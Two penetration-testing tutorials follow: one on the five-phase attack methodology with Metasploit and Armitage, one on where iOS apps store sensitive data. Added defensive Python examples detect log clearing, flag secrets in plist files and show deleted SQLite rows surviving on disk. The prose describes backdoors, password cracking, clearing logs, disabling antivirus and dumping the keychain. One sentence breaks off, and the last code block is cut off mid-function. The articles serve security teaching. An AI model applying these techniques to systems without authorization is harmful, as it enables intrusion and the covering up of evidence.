Metasploit was designed as a framework that penetration testers could use to load exploits into and conduct tests against vulnerabilities. [9] The Metasploit framework is coded and hosted by the security organization Rapid7 and is currently on version 4.6. [9] The framework is continually updated with new and modified modules that may be executed to find and test vulnerabilities. The framework is made up of almost a dozen command line utilities that may be used in conjunction. Considering that the framework is command line based and requires quite a substantial learning curve, Strategic Cyber LLC designed the Armitage graphical user interface (GUI). [3] Armitage is a frontend for the Metasploit framework and can be used to organize and execute a multiphase penetration test. Many security professionals new to the field of penetration testing prefer to learn the Metasploit framework through the Armitage GUI. [5] While there are some functions of the Metasploit framework that may require you to delve into the command line, many of the phases of attack can be accomplished through Armitage. Many veterans of the security penetration testing field have acknowledged that penetration testers should utilize GUIs like Armitage because it is more similar to the utilities used by actual attackers. [4] Both Metasploit and Armitage have come as standard installs in the BackTrack distribution of Linux since version 5. BackTrack Linux is widely considered the operating system of choice for penetration testers. [5] The operating system includes a plethora of utilities to aid in performing penetration tests. An experienced user is often able to use the distribution to conduct a full multiphase penetration test without having to access the internet to download additional tools or documentation. BackTrack is currently on Version 5 revision number 3, although this may be the last revision to use the name BackTrack, as the developers intend the next version to be referred to as Kali Linux.

Reconnaissance Phase

Considering that many penetration testers know their target prior to beginning a test, the reconnaissance phase is largely limited to sniffing the network. BackTrack includes several options for sniffing traffic, as shown in Figure 1. Wireshark is an industry favorite because of the sophistication of its GUI. A tester can leverage Wireshark or a comparable network monitor to capture traffic passively as it passes from node to node. [8] A packet capture is a treasure trove of information for a skilled penetration tester. The tester can scan and filter a packet capture to look for vulnerable services and even begin to capture usernames, hostnames, and in some cases passwords (Figure 1). Wireshark and other sniffer programs work by placing the network interface card (NIC) into promiscuous mode. In normal operation the NIC accepts traffic addressed to its own address and discards everything else; in promiscuous mode the NIC accepts all traffic. A tester using Wireshark can design specific filters to look for important information in the packet capture; the tester may also choose to run the packet capture through a set of Snort rules to look for vulnerabilities. Snort is an open source intrusion detection system in which an administrator can write rules to look for traffic patterns. [11] Snort is a more robust solution for traffic pattern matching than Wireshark, and thus the two may be used in conjunction to perform the reconnaissance phase of an attack. [11] At this point in the multiphase attack, the tester should have an idea of vulnerable services or nodes and ideally some credentials. The tester should not skip this phase; however, they should also not spend too much time in this phase, as other phases are more likely to yield greater benefits.

Scanning Phase

In the scanning phase Metasploit and Armitage begin to become more prolific in the penetration testing process. Nmap and many other enumeration modules are provided in the Metasploit framework, and Armitage can assist in organizing information garnered in this phase. Nmap is a utility that has been used by networking professionals for many years and is preferred because of its simplicity and robust options. [4] Figure 2 shows the enumeration modules available in the Metasploit framework. Many testers wish to scan the network using a light ping sweep or, in a less secure network, a service scan. Nmap can provide both of these options as well as options for avoiding intrusion detection and prevention systems. Nmap is an extraordinary utility for enumerating the internet protocol stack; Metasploit, and particularly Armitage, are able to store and utilize the outputs from Nmap. After enumerating the addressing schemes and services the tester is better able to target particular parts of the network, and the tester may begin to map the target network. A good penetration tester should feel comfortable making use of all the tools available to them. Figure 3 shows the BackTrack utilities for scanning and enumeration that may be used by a penetration tester. Nessus is a vulnerability scanner used by the United States Department of Defense and trusted by many penetration testers. [4] Nessus results and other standard scanning formats may also be imported into Armitage to identify hosts, services, and vulnerabilities. The tester should have a solid plan at this point, with prime targets in mind and a list of attacks to perform in the third phase of attack.

Figure 1. BackTrack Sniffing Tools

Figure 2. Armitage Enumeration Modules

Figure 3. BackTrack Scanning and Enumeration Tools

Gaining Access

The third phase of the multiphase attack is where testers or attackers cross a line and gain access to nodes in an unauthorized manner. The tester must balance conducting a successful penetration test and maintaining the integrity of a client's network. Clients have to weigh the benefit of a real-world penetration test against the potential harm it could do to their production network. A talented penetration tester should understand the limits of their tools, and at what point they become a threat to the availability of the production network. The third phase also represents a choice for the penetration tester. The multiphase attack methodology can be used as a one-pass method where the tester only goes through the phases once, or it can be conducted multiple times throughout the areas of the network. If the tester chooses to only work through the phases once, the third phase of gaining access should be divided into two subsections. In the first subsection the tester will try to gain access, and in the second subsection the tester will spread to all the targets identified in the scanning phase. Deciding between working the phases once and going through them multiple times can depend on the target network itself or the tester's personal preferences. A larger network that is easily divisible into smaller sections may be more effectively tested by using the multiphase approach more than once. In either case the tester must consider using a compromised host as a launchpad for further exploits. [6] This consideration must be carefully evaluated by a tester because it may skew results. A vulnerability may only be exploitable if another host has already been compromised. [6] The tester should always denote launchpad tests in the final report and make sure the client understands the methodology behind the tests. The tester must always consider that an attacker will utilize any method available to them and will certainly leverage a launchpad scenario to gain access. In this phase the tester will begin running exploits against the vulnerabilities identified in the scanning phase. Metasploit includes modules that can perform a wide array of attacks; in order to fully gain access the tester should be able to prove access to the confidentiality of a system or a set of data. [10] The tester can choose from an array of attacks: a brute force may be appropriate for a telnet service, whereas a directory traversal attack may be best on an FTP or HTTP web server. Choosing the proper exploits to use in order to gain access is an essential part of penetration testing. If the tester runs too wide a variety of exploits they increase the risk of being detected and prevented. The tester must rely heavily on information from the first two phases in order to choose the exploits with the highest chance of success. Deciding on a proper payload is another key factor in the gaining access phase. The tester may only get one payload to the target, and deciding whether that payload should simply alert on a success or attempt to fully compromise the host is important.
Going with too strong a payload that does too much may guarantee detection by a host-based defense mechanism; conversely, some exploits by their very nature only work once before crashing a service, so a conservative payload may cost the tester a successful access. Metasploit has a custom shell environment called Meterpreter that may be packaged as a payload; many testers choose this payload because it has a small footprint, is very versatile, and is loaded with penetration testing functionality. [7]

Maintaining Access

Once the tester has gained the initial foothold in the target network, the maintaining access phase begins, where the tester tries to solidify their grip on the target. In the maintaining access phase the Meterpreter shell environment becomes much more important. Meterpreter has options and settings that can be manipulated directly from the Armitage GUI. Armitage can use Meterpreter to import additional tools to the victim and set up backdoors. Netcat is a backdoor utility that can easily be imported and set up using Meterpreter. There are many other utilities that can also be imported to create a backdoor. [4] Rather than setting up a malicious backdoor service, experienced penetration testers often try to emulate legitimate traffic as much as possible; one way to effectively masquerade as an authorized user is to obtain valid credentials. Valid credentials are arguably some of the most important information a penetration tester or attacker can uncover. Meterpreter and Armitage have some options for obtaining sets of valid credentials. Meterpreter is best designed to exploit hosts running Windows operating systems; while Meterpreter can run on Linux and UNIX based hosts, it is more limited than on a Windows host. [7] Meterpreter is able to export Windows LM hashes directly into password cracking utilities; the shell can also export Linux shadow files, but it may require more interaction from the penetration tester. For Windows targets Armitage can accept LM hashes from Meterpreter and begin to directly crack them in John the Ripper, a popular password cracking utility. Figure 4 shows Armitage cracking passwords from Meterpreter using John the Ripper. The unified interface allows for penetration testing optimization and organization of important information. A penetration tester must consider that the specific vulnerability they used to compromise the target may eventually be patched, and the objective of the maintaining access phase is to have other options for access.

Figure 4. Armitage Password Cracking

Covering Tracks
In the final phase of penetration testing, the tester should attempt to cover up the evidence of the compromise ever occurring. A penetration tester must take extra care during this phase: the tester does not want to remove information that could be valuable in explaining and reporting the test to the client. A real-world attacker would not be so kind as to refrain from covering their tracks, but the penetration tester may need that information as a teaching tool. One method that penetration testers may find valuable is to back up logs and other information prior to deleting them; this way the client's IT staff may be evaluated on their forensic abilities, and the log information is still available to show testing results. Meterpreter includes a particularly useful script for clearing Windows logs. The script (log.clear) can be executed from a Meterpreter shell environment. [7] By default the script only clears the system event log; however, it can be configured to clear all logs. The covering tracks phase may seem straightforward, but it can be deceptively difficult to accomplish. One way to make it easier is to work the phases while considering them all, as new assets become available. Considering the phases as a whole will yield benefits: an experienced penetration tester is able to make decisions during the test that will positively impact the later actions in the test. [5] Taking the covering tracks phase as an example, it may be accomplished more effectively if logging does not occur. In the third phase, gaining access, the penetration tester can utilize scripts built into Metasploit to disable anti-virus and firewalls on compromised hosts. Some actions come with experience, but a skillful penetration tester can take some steps to perform a better test.
At the beginning and end of each phase the penetration tester should consider what new options are now available and whether these options open any new opportunities. The tester should evaluate the phases that come before and after the current phase; any new options that could improve the other phases should be evaluated and pursued.
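The defender's side of the covering tracks phase, as an added example that is not from the article: detection logic over constructed Windows event records as a central log collector would hold them (forwarded copies survive a clear on the host), flagging the "log cleared" events (IDs 1102 and 104) and a silent gap inside one channel, which is what a clear leaves behind when the clear event itself is gone. The record format and timestamps are constructed.

```python
from datetime import datetime, timedelta

# Windows event IDs written by the Eventlog service when a log is cleared; the IDs
# are real, the records below are constructed.
CLEAR_EVENT_IDS = {
    1102: "Security: the audit log was cleared",
    104: "System/Application: the log file was cleared",
}

# Constructed records in "timestamp|event_id|channel|message" form, as a central
# collector would hold them (a clear on the host does not remove forwarded copies).
SAMPLE_EVENTS = """
2013-06-10 08:00:12|4624|Security|An account was successfully logged on
2013-06-10 08:03:40|7036|System|The Windows Time service entered the running state
2013-06-10 09:15:02|4624|Security|An account was successfully logged on
2013-06-10 09:16:45|104|System|The System log file was cleared
2013-06-10 09:17:01|7036|System|The Remote Registry service entered the running state
2013-06-10 21:30:00|4624|Security|An account was successfully logged on
""".strip().splitlines()


def parse_event(line):
    """Split one collector record into its fields."""
    ts, eid, channel, message = line.split("|", 3)
    return {"time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
            "id": int(eid), "channel": channel, "message": message}


def find_log_tampering(lines, max_gap=timedelta(hours=6)):
    """Return (kind, channel, detail) findings.

    'cleared' findings come from explicit clear events; 'gap' findings flag a silent
    stretch longer than max_gap inside one channel, which is what a clear (or a
    disabled logging service) leaves behind when the clear event itself is missing."""
    events = sorted((parse_event(l) for l in lines if l.strip()),
                    key=lambda e: e["time"])
    findings = [("cleared", e["channel"], e["time"])
                for e in events if e["id"] in CLEAR_EVENT_IDS]
    by_channel = {}
    for e in events:
        by_channel.setdefault(e["channel"], []).append(e)
    for channel, evs in by_channel.items():
        for prev, cur in zip(evs, evs[1:]):
            gap = cur["time"] - prev["time"]
            if gap > max_gap:
                findings.append(("gap", channel, gap))
    return findings


if __name__ == "__main__":
    for kind, channel, detail in find_log_tampering(SAMPLE_EVENTS):
        print(kind, channel, detail)
```

The gap threshold is a tuning knob: a channel that is normally quiet for hours needs a larger value than a busy Security log, otherwise the check produces noise.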


Working the Phases Holistically

The phases are designed in a chronological order, but they do not have to always be carried out in that direct order. There are many cases where

A penetration tester is well served by putting a methodology to their testing strategy. Much like networking professionals utilize the OSI model to organize and troubleshoot networking issues, the penetration tester can utilize the EC Council five phase attack plan to organize the penetration test. [1,8] The five phases must be considered chronologically as they were designed, but the phases may best be utilized if evaluated holistically. Working through each phase carefully while continually looking at the testing plan as a whole is the most effective way to leverage the five phase model. A penetration tester's tool kit should be an extension of the tester themselves. Knowing what utilities are available to the tester and using those tools to their full potential is essential. BackTrack Linux is a distribution designed specifically for penetration testers; the tools contained in BackTrack are designed to accomplish a full multiphase penetration test. [5] Metasploit and the accompanying Armitage GUI are two key tools in a skilled penetration tester's tool kit. [3,9] The robustness of Metasploit and the organization capabilities of Armitage make these tools stand out among alternatives. Tools will change, but a strong methodology will stay current through changes in technology. A good penetration tester works to understand the resources available to them and how these resources can be applied effectively in each phase. Carefully planning a penetration test can occur prior to ever receiving a job; while the target does change the applicable tools, a good penetration tester can prepare for many different scenarios. Practicing in lab environments and with virtual technologies will assist a tester in compiling a strong tool kit. The best penetration tester prepares, and is interested in continually improving their craft through practice.

Works Cited

[1] EC Council. (2010). Ethical Hacking and Countermeasures: Attack Phases. Clifton Park: Cengage Learning.
[2] EC-Council. (2012). C|EH Candidate Handbook v1.6. EC-Council.
[3] Fast and Easy Hacking. (2013). Armitage. Retrieved from Fast and Easy Hacking: http://www.fastandeasyhacking.com/
[4] Harris, S. (2012). All-In-One CISSP Exam Guide. New York: McGraw Hill.
[5] Harris, S., Harper, A., & Ness, J. (2011). Gray Hat Hacking: The Ethical Hacker's Handbook. New York: McGraw Hill.
[6] Masood, R., Um-e-Ghazia, U., & Anwar, Z. (2011). SWAM: Stuxnet Worm Analysis in Metasploit. Frontiers of Information Technology, 142-147.
[7] Offensive Security. (2012). Existing Scripts. Retrieved from Metasploit Unleashed: http://www.offensive-security.com/metasploit-unleashed/Existing_Scripts
[8] Paquet, C. (2009). Implementing Cisco IOS Network Security: Authorized Self-Study Guide. Indianapolis: Cisco Press.
[9] Rapid7. (2013). Penetration Testing Solutions – Metasploit. Retrieved from Rapid7:
[10] Refai, M. (2006). Exploiting a buffer overflow using metasploit framework. Proceedings of the 2006 International Conference on Privacy, Security and Trust: Bridge the Gap Between PST Technologies and Business Services (pp. 1-4). New York: ACM.
[11] Roesch, M., & Green, C. (2003-2012). Snort Users Manual 2.9.3. Retrieved October 19, 2012, from Snort: manual.
[12] Siles, R. (2010). Assessing and Exploiting Web Applications with the Open-Source Samurai Web Testing Framework. Taddong: Springer Berlin Heidelberg.

Lance Cleghorn

A North Carolina native, Lance received a Bachelor of Science degree in Information Technology from East Carolina University. Graduating Summa Cum Laude, Lance completed his undergraduate degree in 2012. As an undergraduate student Lance concentrated in Cisco networking technology. Lance is currently pursuing a Master of Science in Information Security at East Carolina University. Lance holds several major industry certifications, including the Associate of ISC2 towards a CISSP, CCNP, CompTIA Security+, EMCISA, and MCP.


Mobile Applications: The True Potential Risks
Where to look for information when performing a Pentest on a Mobile Application
Since the introduction of the iPhone, Apple has sold more than 315 million iOS devices over the past few years and 750 million Android devices have been activated to date.

Article comes from PenTest WebApp TO BE RELEASED

The smartphone platform has created a new business, and companies want to make their services available on mobile devices in order to reach out to users very quickly and easily. Both iOS and Android devices have enough power and performance to perform most of the tasks one can do on a laptop, and their applications span a range of categories including banking, healthcare, and trading. With an increasing stronghold in the market, a plethora of companies are developing new applications to work with these new mobile platforms. These applications often deal with Personally Identifiable Information (PII), credit card, financial and other sensitive data. With this trend it is important for security professionals to understand the nuances of penetration testing mobile devices. To achieve this, one must comprehend how these applications are developed and where developers may store critical data. With that in mind, this paper focuses on helping pentesters understand where critical data may be stored. Note that the mechanics of performing the actual penetration test itself will be addressed in a future article.


This article mainly covers what security professionals should be looking for when performing a penetration test of a mobile application. The main discussion concentrates on data found in iOS applications; similar data concerns exist on Android and Windows 7-based phones, but for the purpose of this article those will not be discussed at this time.


Web applications are no longer limited to the traditional HTML-based interface. Web services and mobile applications have become more common and are regularly being used to attack clients and organizations. As such, it has become very important that pentesters understand how to evaluate the security of these systems. The iPhone provides developers with a platform to develop two types of applications:
• Web-based applications, where JavaScript, CSS, and HTML5 technologies run inside Safari/WebKit;
• Native iOS applications, which are developed using Objective-C and compiled for operation and execution on the device itself.

To adequately test mobile applications, professionals need to learn not only how to build a test environment for mobile applications and web services, but also how to deploy various techniques to discover flaws within the applications and backend systems. Most importantly, pentesters need to know where to look to find the critical data that is typically stored on the device. The requirements for this are:
• Understanding the mobile platforms and architecture,
• Building a test environment,
• Intercepting traffic to web services and from mobile applications,
• Injecting malicious traffic into web services,
• Looking for potential sensitive data leaks on the device.
There are two standard approaches to testing a mobile application. One approach is to perform "Whitebox Testing", where pentesters have access to the actual source code of the application and full documentation. This method can be applied in order to simulate what a developer with internal access to the application and source code could do if operating in a rogue capacity. The second approach is to perform "Blackbox Testing", where pentesters have no source code or related documentation and only have the publicly downloadable application to work with. This method simulates what could happen if an outside hacker with no knowledge of your application performed an attack. The main attack vector is typically to intercept traffic and inject rogue content to see what information can be obtained. This type of testing typically tries to exploit flaws like cross-site scripting (XSS), link injection, and SQL injection. Both approaches are worthwhile and should be performed as part of any complete security test. In our experience, blackbox testing is most often performed by security professionals, but there is much to be gained by incorporating a whitebox test as part of this process, especially in the SDLC development process.
A whitebox test will discover things like:
• Internal security holes,
• Logic flaws,
• Broken or poorly structured paths in the coding processes,
• The flow of specific inputs through the code,
• Expected output,
• The functionality of conditional loops,
• Testing of each statement, object and function on an individual basis,
• Memory leaks.
To help guide the penetration tester, OWASP ( _Testing_Cheat_Sheet) has released a series of methodologies that help in this process (see Mobile_Security _Project for more details). In the following sections, we are going to focus on how iOS applications are vulnerable rather than on the iPhone operating system itself. In reality, there is an overlap between iPhone OS security and iPhone application security, so understanding the iOS platform and its security technology will help pentesters properly assess the security of iPhone applications. The main areas of focus while assessing the security of iPhone applications are:
• Application traffic analysis,
• Privacy issues,
• Local data storage,
• Caching,
• Push notifications.

Application Traffic Analysis

Penetration testing iOS applications is not all that different from testing client-server applications. Both still interact with server-side components over a network using similar protocols, so the process also involves network penetration testing and web application penetration testing techniques. The primary goal in traffic analysis is to capture and analyze the network traffic to find vulnerabilities and then try to exploit them. iOS applications may transmit data to the server over any of these communication mechanisms:
• Clear-text transmission, such as HTTP,
• Encrypted channel, such as HTTPS,
• Custom protocols or low-level streams.
In general, mobile applications are more prone to man-in-the-middle (MITM) attacks because most people access them over Wi-Fi, which is not always secure. An attacker who has access to the same Wi-Fi can run tools and hijack user sessions. As plain-text transport protocols are vulnerable to MITM attacks, applications which transmit sensitive data must use encrypted communication protocols like HTTPS. During penetration testing, observe whether or not the application is transmitting any sensitive data over the encrypted channel. Application traffic can be captured by configuring the proxy settings available on all iOS devices. Once a proxy is set up, the iOS system will route its traffic through the configured proxy, where pentesters can analyze what is being transmitted and received to determine what is vulnerable, and then develop a plan of attack similar to what pentesters would do for any other web application.

Data Privacy Issues

Every iPhone has an associated unique device identifier, derived from a set of hardware attributes, called a UDID. A UDID is burned into the device and one cannot remove or change it. However, it can be spoofed. Although Apple has recently indicated that they will no longer accept applications in the App Store that access the UDID of a device ( php?id=3212013a), there are many applications currently in the App Store that still do so. While penetration testing, observe the network traffic for UDID transmission. A UDID in the network traffic indicates that the application is collecting the device identifier, or might be sending it to a third-party analytics company to track the user's behavior. Apart from the UDID, applications may transmit personally identifiable information like age, name, address, and location details to third-party analytics companies. Transmitting personally identifiable information to third-party companies without the user's knowledge also violates the user's privacy. So, during penetration testing, carefully observe the network traffic for the transmission of any important data.

Client-side data storage is an area where some development teams assume that users will not have access. On the contrary, many of the most publicized mobile application security incidents have been caused by insecure or unnecessary client-side data storage. Devices' file systems are no longer a sandboxed environment where you cannot expect a malicious user to be inspecting. Rooting or jailbreaking a device usually circumvents any protections, and in some cases, where data is not protected properly, all that is needed to view application data is to hook the device up to a computer and use some specialized tools. A few of the ways that a malicious actor can access this data are listed below:

From Backups

When an iPhone/iPad is connected to iTunes, iTunes automatically takes a backup of everything on the device. This means that sensitive files will also end up on the workstation. An attacker who gets access to the workstation can read the sensitive information from the stored backup files.

Physical access to the device

Individuals lose their phones, and phones get stolen very easily. In this case, an attacker will get physical access to the device and be able, through various methods, to read the sensitive information stored on the phone. The passcode set on the device will not protect the information, as it is possible to brute force the iPhone's simple 4-digit passcode within 20 minutes.

Malware

Leveraging a security weakness in iOS may allow an attacker to design malware which can steal the files on the iPhone remotely.

In most cases, during a penetration test, local storage issues are easily and often found. You do not need expensive tools to find this data. Simply browse a jailbroken device for these file types. If you have source code, simple commands like recursive grep and strings can do wonders in identifying keywords that deal with planting data into files like these (SQL statements like INSERT, and others). In some cases, you will need tools to convert or read the file formats. Installing SQLite via the command line is simple enough; other tools like plutil will allow for conversion of a binary .plist file (temporary files that typically store sensitive data) to a readable XML one. The point is that anyone can do this if you know what to look for.

Local Data Storage

Mobile applications store the data locally on the device to maintain essential information across the application execution, for a better performance and offline access. Developers use the local device storage to store information such as user preferences and application configurations. As device theft is becoming an increasing concern, especially in the enterprise, insecure local storage is considered to be one of the top risks in mobile application threats. In fact, it has been categorized as the top risk in the OWASP mobile top-10 (

Data protection is an important category when testing mobile applications as they are more susceptible to loss and theft compared to regular computers. In addition to this, cached data may get copied to the machines that are used for syncing and could be stolen from there. Research has shown that iOS does cache sensitive information such as keystrokes and snapshots, often for extended periods of time. Moreover, the application itself may be storing sensitive information in the form of temporary files, .plist files, or in the client side SQLite database. On an iOS device, applications may store local information for use in any of the locations listed below.
• Plist files,
• Keychain,
• Application’s home directory,
• Cache,
• SQLite databases,
• Cookie stores,
• Logs.

During testing, it is critical to identify these risks and provide recommendations to mitigate them. This is an area that some pentesters overlook as they concentrate solely on network traffic analysis, which is only a small piece of the puzzle. We will attempt to explain the importance of each of these local storage areas and why they are important to a pentester.

iPhone Application Directory Structure

The key to any thorough pentest is to understand the underlying structure of the device and the applications stored on it. Knowing where to look is more than half the battle. iOS applications are treated as a bundle represented within a directory. The bundle groups all the application resources, binaries, and other related files into a directory. In iOS, applications are executed within a jailed environment (sandbox) with mobile user privileges. Unlike the Android UID based segregation, iOS applications run as one user. Apple says ‘The sandbox is a set of fine-grained controls limiting an application’s access to files, preferences, network resources, hardware, and so on. Each application has access to the contents of its own sandbox but cannot access other applications’ sandboxes. When an application is first installed on a device, the system creates the application’s home directory, sets up some key subdirectories, and sets up the security privileges for the sandbox (iOS Application Programming Guide).’ A sandbox is a restricted environment that prevents applications from accessing unauthorized resources. However, upon iOS jail-break, all of the sandbox protections are disabled. This exposes all local storage. When an application is installed on the iPhone, it creates a directory with a unique identifier under the /var/mobile/Applications directory. Everything that is required for an application to execute will be contained in the created home directory. So it is important that you take the time to understand this structure ( before testing.

It’s important to distinguish what data is at risk and where it is insecurely stored:
• Usernames,
• Authentication tokens or passwords,
• Cookies,
• Location data,
• Stored application logs or debug information,
• Cached application messages or transaction history,
• UDID or IMEI,
• Personal information (DoB, address, Social, and so on),
• Device name,
• Network connection name,
• Private API calls for high user roles,
• Credit card data or account data.

Plist files
A Property List or “Plist” file is a structured binary formatted file which contains the essential configuration of a bundle executable. It is typically stored in nested key value pairs. Plist files are used to store the user preferences and the configuration information of an application. A plist can be either in XML format or in binary format. As XML files are not the most efficient means of storage, most applications use binary formatted .plist files. Binary formatted data stored in the .plist files can be easily viewed or modified using .plist editors, which convert the binary formatted data into XML formatted data, after which it can be edited easily. Plist files can be viewed and modified easily on both jailbroken and non-jailbroken iPhones. The technical implementation of reading and writing values for developers is fairly straightforward and provides one of the quickest ways to access stored information, so it is used frequently. Developers rarely use third party libraries in order to read from .plists. Plists reside with the application structure on the device, so if the application is deleted from the phone, the stored data will be deleted with it. Plist files are primarily designed to store the user preferences and application configuration; however, applications may use .plist files to store clear text access tokens, keys, usernames, passwords and session related information. So, while penetration testing, view all the .plist files available under the application’s home directory and look for sensitive information, like usernames, passwords, the user’s personal information, session cookies, and so on.

Keychain Storage

Most security conscious developers will store sensitive data in the keychain. The Keychain provides a more secure and encrypted mechanism for storing application specific information than .plist files. The Keychain is an encrypted container (128 bit AES algorithm) and a centralized SQLite database that traditionally holds identities and passwords for multiple applications and network services, but can also store any other string data if the developer decides to do so with restricted access rights. In iOS, the keychain SQLite database is used to store small amounts of sensitive data like usernames, passwords, encryption keys, certificates, and private keys. In general, iOS applications store the user’s credentials in the keychain to provide transparent authentication and to not prompt the user every time for login. Developers leverage the keychain services API or other third party API wrappers to direct the operating system to store sensitive data securely on their behalf, instead of storing it in a property list file or a plaintext configuration file. On the iPhone, the keychain SQLite database file is located at /private/var/Keychains/keychain-2.db. Attributes for all the keychain item classes are documented in the Keychain Item class keys and values section in Apple’s documentation (https://developer.

The Keychain database is encrypted with a hardware-specific key which is unique to each device. The hardware key cannot be extracted from the device, so the data stored in the keychain can only be accessed on the device itself and cannot be moved to another device. The Keychain database is tied to the device, so even if an attacker obtains access to the keychain through physical access to the file system or in a remote attack, he cannot decrypt and view the file contents. Keychain data is logically zoned and data stored by one application is not accessible to another application.

Keychain data of an iOS application is stored outside the application’s sandbox. So the operating system process securityd enforces the access control and regulates access to the keychain data in such a way that only applications with the correct permissions can read their data. Keychain access permissions of an iOS application are defined in the code sign entitlements. Keychain Services uses these entitlements to grant permissions for the applications to access their own keychain items. With the introduction of data protection mechanisms in iOS, sensitive data stored in keychain items is protected with another layer of encryption which is tied to the user’s passcode. Data protection encryption keys (protection class keys) are derived from a device’s hardware key and a key generated from the user’s passcode. So the encryption offered by the data protection API is only as good as the strength of the user’s passcode. Data protection is designed to protect the user’s data in case a device is lost or stolen. Since the Keychain is more secure, third party applications usually store the plain text credentials in the keychain to not prompt the user every time for login and to preserve the data across re-installation or upgrading of the application. So while penetration testing, we have to look at the keychain items to see what kind of information is being stored by the applications in the keychain. But the keychain service does not allow viewing the keychain items of any application without proper entitlements. On a jail-broken device, this restriction can be broken and it is possible to dump all the keychain items. So even though the keychain is more secure, if the phone is in the hands of a malicious actor and jail-broken, nothing is safe. Once a phone is jail-broken, you have the keys to the kingdom.
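The binary-to-XML conversion and the search for sensitive keys described in the Plist files section above, as an added example that is not from the article. Python's plistlib stands in for plutil; the sample preferences file, its key names and its placeholder values are constructed inside the block, and SENSITIVE_KEY_RE is a starting heuristic, not an exhaustive list.

```python
"""Convert a binary .plist to XML and flag keys that look like secrets.

Added example, not code from the article. The sample preferences file is
constructed in memory by `build_sample_binary_plist`; against a device you
would read the bytes of a .plist copied from the application's home
directory instead.
"""
import plistlib
import re
from typing import Any, Iterator

# Key names that frequently carry credentials or session material (heuristic).
SENSITIVE_KEY_RE = re.compile(
    r"pass(word|wd)?|pwd|secret|token|api[_-]?key|session|cookie|auth|udid",
    re.IGNORECASE,
)


def build_sample_binary_plist() -> bytes:
    """Constructed sample of an insecurely written preferences file.
    All values are placeholders, not real credentials."""
    prefs = {
        "AppVersion": "2.3.1",
        "Theme": "dark",
        "Account": {
            "username": "alice@example.com",
            "password": "PLACEHOLDER-PASSWORD",  # belongs in the keychain, not here
            "rememberMe": True,
        },
        "Session": {"authToken": "PLACEHOLDER-TOKEN", "expires": 1700000000},
        "Recent": ["doc1.pdf", "doc2.pdf"],
    }
    return plistlib.dumps(prefs, fmt=plistlib.FMT_BINARY)


def to_xml(data: bytes) -> str:
    """Same job as `plutil -convert xml1`: binary (or XML) plist in, XML text out."""
    return plistlib.dumps(plistlib.loads(data), fmt=plistlib.FMT_XML).decode()


def walk(obj: Any, path: str = "") -> Iterator[tuple[str, Any]]:
    """Yield (dotted path, leaf value) for every scalar in a plist object."""
    if isinstance(obj, dict):
        for key, val in obj.items():
            yield from walk(val, f"{path}.{key}" if path else str(key))
    elif isinstance(obj, list):
        for i, val in enumerate(obj):
            yield from walk(val, f"{path}[{i}]")
    else:
        yield path, obj


def find_sensitive_keys(data: bytes) -> list[str]:
    """Dotted paths of leaves whose own key name matches SENSITIVE_KEY_RE."""
    hits = []
    for path, _value in walk(plistlib.loads(data)):
        leaf = re.sub(r"\[\d+\]$", "", path.rsplit(".", 1)[-1])
        if SENSITIVE_KEY_RE.search(leaf):
            hits.append(path)
    return hits


if __name__ == "__main__":
    blob = build_sample_binary_plist()
    print(to_xml(blob))
    for hit in find_sensitive_keys(blob):
        print("review:", hit)
```

The key-name match is deliberately broad: during a test you want every candidate path listed and then decide by hand whether the value is a real credential, since a false positive costs seconds and a missed plaintext password costs a finding.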

SQLite Storage

SQLite is a cross-platform C library that implements a self-contained, embeddable, zero-configuration SQL database engine. The SQLite database does not need a separate server process, and the complete database with multiple tables, triggers, and views is contained in a single disk file. The SQLite database offers all the standard SQL constructs, including Select, Insert, Update, and Delete. As SQLite is portable, reliable, and small, it is an excellent solution for persistent data storage on iOS devices. The SQLite library that comes with iOS is a lightweight and powerful relational database engine that can be easily embedded into an application. The library provides fast access to the database records. As the complete database is operated as a single flat file, applications can create local database files and manage the tables and records very easily. In general, iOS applications use the SQLite database to store large and complex data as it offers good memory usage and speed. The SQLite database that comes with iOS does not have built-in support for encryption. Most iOS applications store lots of sensitive data in plain text format in SQLite files. Unencrypted sensitive information stored in a SQLite file can be stolen easily by gaining physical access to the device or from the device backup. In addition, if an entry is deleted, SQLite marks the record as deleted but does not purge it. Therefore, in case an application temporarily stores and then removes sensitive data from a SQLite file, the deleted data can be recovered easily by reading the SQLite Write Ahead Log. SQLite files can be created with or without any file extension. The most common extensions are .sqlitedb and .db.
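The recovery of deleted rows described above, as an added example that is not from the article. It builds a throwaway SQLite file with a placeholder token, deletes the row and then checks whether the bytes survive in the file, first with SQLite's default behaviour (the freed cell is only marked free) and then with the secure_delete pragma, which is the mitigation a developer can apply. File names and values are constructed here; the carve_strings helper is a minimal stand-in for the strings utility the text mentions.

```python
"""Show why a deleted SQLite row can still be read from the file.

Added example, not code from the article. It builds a throwaway database
with a placeholder session token, deletes that row, and searches the raw
file bytes for the token: once with SQLite's default behaviour, which only
marks the freed cell, and once with PRAGMA secure_delete=ON, which zeroes
it. Paths and values are constructed here.
"""
import os
import sqlite3
import tempfile

# Constructed placeholder. Deliberately longer than the 4-byte freeblock
# header that SQLite writes over the start of a freed cell.
SECRET_TOKEN = "PLACEHOLDER-SESSION-TOKEN-0123456789"


def carve_strings(data: bytes, min_len: int = 8) -> list[str]:
    """`strings`-style carve of printable ASCII runs, the quickest first look
    at a database, cache or .plist copied off a device."""
    out, run = [], bytearray()
    for b in data:
        if 32 <= b < 127:
            run.append(b)
            continue
        if len(run) >= min_len:
            out.append(run.decode())
        run = bytearray()
    if len(run) >= min_len:
        out.append(run.decode())
    return out


def deleted_token_survives(secure_delete: bool) -> bool:
    """Return True if SECRET_TOKEN is still in the file after its row is deleted."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "app.sqlitedb")
        con = sqlite3.connect(path)
        # Rollback journal mode: the journal is unlinked after each commit,
        # so the main file is the only artefact left to inspect.
        con.execute("PRAGMA journal_mode=DELETE")
        con.execute("PRAGMA secure_delete=" + ("ON" if secure_delete else "OFF"))
        con.execute("CREATE TABLE session(id INTEGER PRIMARY KEY, token TEXT)")
        # Two rows and a WHERE clause, so the delete frees one cell instead of
        # taking SQLite's whole-table truncate path.
        con.execute("INSERT INTO session(token) VALUES (?)", (SECRET_TOKEN,))
        con.execute("INSERT INTO session(token) VALUES (?)", ("keep-me",))
        con.commit()
        con.execute("DELETE FROM session WHERE token = ?", (SECRET_TOKEN,))
        con.commit()
        # SQL no longer sees the row...
        left = con.execute("SELECT count(*) FROM session").fetchone()[0]
        con.close()
        assert left == 1
        # ...but the bytes may still be sitting in the freed cell.
        with open(path, "rb") as fh:
            carved = carve_strings(fh.read())
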